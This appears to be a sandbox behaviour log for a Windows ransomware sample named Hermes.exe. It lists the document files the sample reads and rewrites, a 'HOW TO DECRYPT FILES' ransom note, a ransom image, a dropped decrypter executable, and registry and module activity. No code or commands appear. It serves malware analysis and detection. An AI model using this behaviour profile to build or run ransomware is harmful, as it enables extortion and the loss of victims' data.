Read C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx size = 4096, size_out = 3443 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\V_Zl34r.xlsx size = 33130, size_out = 33130 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx size = 10804, size_out = 10804 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx size = 53539, size_out = 53539 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc size = 30665, size_out = 30665 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv size = 53275, size_out = 53275 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf size = 55932, size_out = 55932 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv size = 58056, size_out = 58056 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf size = 33933, size_out = 33933 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv size = 11717, size_out = 11717 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv size = 17749, size_out = 17749 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt size = 96596, size_out = 96596 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt size = 39600, size_out = 39600 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt size = 23102, size_out = 23102 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx size = 74185, size_out = 74185 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls size = 31393, size_out = 31393 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls size = 88186, size_out = 88186 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls size = 58491, size_out = 58491 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx size = 82557, size_out = 82557 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico size = 29926, size_out = 29926 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv size = 70608 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt size = 27488 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi size = 92256 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 size = 17040 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\du_y8ZA.bmp size = 98608 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv size = 34672 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kXyvY.bmp size = 1216 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\ljwNeYj.avi size = 85360 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\mJmzsgIR.avi size = 4080 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\NwrDTZ.docx size = 10128 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi size = 102384 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg size = 58464 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 size = 54512 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png size = 62352 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv size = 91120 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls size = 24336 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png size = 27008 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 size = 63280 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg size = 44336 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx size = 84592 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\1v32WDK.pptx size = 22352 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\4z4 82v.xlsx size = 87040 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\6jL9GY5.xlsx size = 18896 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\9dHCFyZ_.odt size = 89952 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\Am2R.docx size = 5824 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx size = 90320 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx size = 60736 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\IDj9.docx size = 70768 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\oK6_.pptx size = 74000 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\pFdPoLW.docx size = 49632 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx size = 87744 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx size = 3456 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\V_Zl34r.xlsx size = 33136 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx size = 10816 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx size = 53552 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc size = 30672 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv size = 53280 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf size = 55936 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv size = 58064 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf size = 33936 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv size = 11728 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv size = 17760 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt size = 96608 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt size = 39616 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt size = 23104 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx size = 74192 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls size = 31408 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls size = 88192 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls size = 58496 True 1
Fn
Data
Write C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx size = 82560 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\HOW TO DECRYPT FILES.txt size = 620 True 1
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 4096 True 2
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 9636 True 1
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 19600 True 1
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 8400 True 1
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 30800 True 1
Fn
Data
Write C:\FD1HVy\ransom.jpg size = 26131 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 4096 True 31
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 9386 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 58800 True 2
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 23904 True 8
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 28000 True 25
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 11200 True 16
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 22400 True 11
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 12704 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 19600 True 24
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 8400 True 23
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 5600 True 14
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 16800 True 18
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 30800 True 16
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 25200 True 14
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 14000 True 22
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 32304 True 2
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 21104 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 44904 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 29504 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 26704 True 10
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 39200 True 3
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 33600 True 5
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 37904 True 2
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 15504 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 54600 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 40704 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 36400 True 3
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 42000 True 4
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 12600 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 35000 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 9904 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 50400 True 5
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 44800 True 3
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 46200 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 9800 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 7000 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 47600 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 7104 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 53200 True 1
Fn
Data
Write C:\FD1HVy\Hermes-decrypter-new.exe size = 33518 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 4096 True 32
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 9386 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 65536 True 3
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 24064 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 28000 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 50400 True 3
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 5600 True 15
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 47600 True 11
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 56000 True 7
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 44800 True 11
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 46304 True 7
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 39200 True 13
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 40704 True 12
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 42000 True 6
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 54704 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 64240 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 10064 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 22400 True 4
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 11200 True 4
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 33600 True 3
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 36400 True 6
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 8400 True 15
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 49104 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 43504 True 4
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 58800 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 53200 True 6
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 30800 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 16800 True 2
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 57504 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 14000 True 4
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 25200 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 19600 True 4
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 11464 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 9800 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 5864 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 57400 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 15664 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 51904 True 1
Fn
Data
Write C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe size = 29318 True 1
Fn
Data
Registry (35)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 - True 5
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = HWRPortReuseOnSocketBind, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = SchUseStrongCrypto, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = SchSendAuxRecord, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = SystemDefaultTlsVersions, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = RequireCertificateEKUs, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\FD1HVy\Hermes-decrypter-new.exe show_window = SW_SHOWNORMAL True 1
Fn
Module (209)
»
Operation Module Additional Information Success Count Logfile
Load mscoree.dll base_address = 0x744c0000 True 1
Fn
Load mscorjit.dll base_address = 0x0 False 1
Fn
Load clrjit.dll base_address = 0x727b0000 True 1
Fn
Load comctl32.dll base_address = 0x6eb70000 True 1
Fn
Load comctl32.dll base_address = 0x6e960000 True 1
Fn
Load C:\WINDOWS\system32\en-US\tzres.dll.mui base_address = 0x8260001 True 3
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e90000 True 27
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77bb0000 True 16
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77920000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75bb0000 True 1
Fn
Get Handle c:\windows\syswow64\wtsapi32.dll base_address = 0x742b0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x74b70000 True 4
Fn
Get Handle c:\windows\syswow64\kernelbase.dll base_address = 0x74ea0000 True 1
Fn
Get Handle c:\users\fd1hvy\desktop\hermes.exe base_address = 0x400000 True 11
Fn
Get Handle comctl32.dll base_address = 0x0 False 2
Fn
Get Handle c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.15063.413_none_55bc94a37c2a2854\comctl32.dll base_address = 0x6eb70000 True 4
Fn
Get Handle c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.483_none_6dad63fefc436da8\comctl32.dll base_address = 0x6e960000 True 5
Fn
Get Handle c:\windows\syswow64\mscoree.dll base_address = 0x744c0000 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 254 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 260 True 2
Fn
Get Filename c:\users\fd1hvy\desktop\hermes.exe process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hermes.exe, size = 2048 True 2
Fn
Get Filename c:\windows\syswow64\ntdll.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hermes.exe, file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
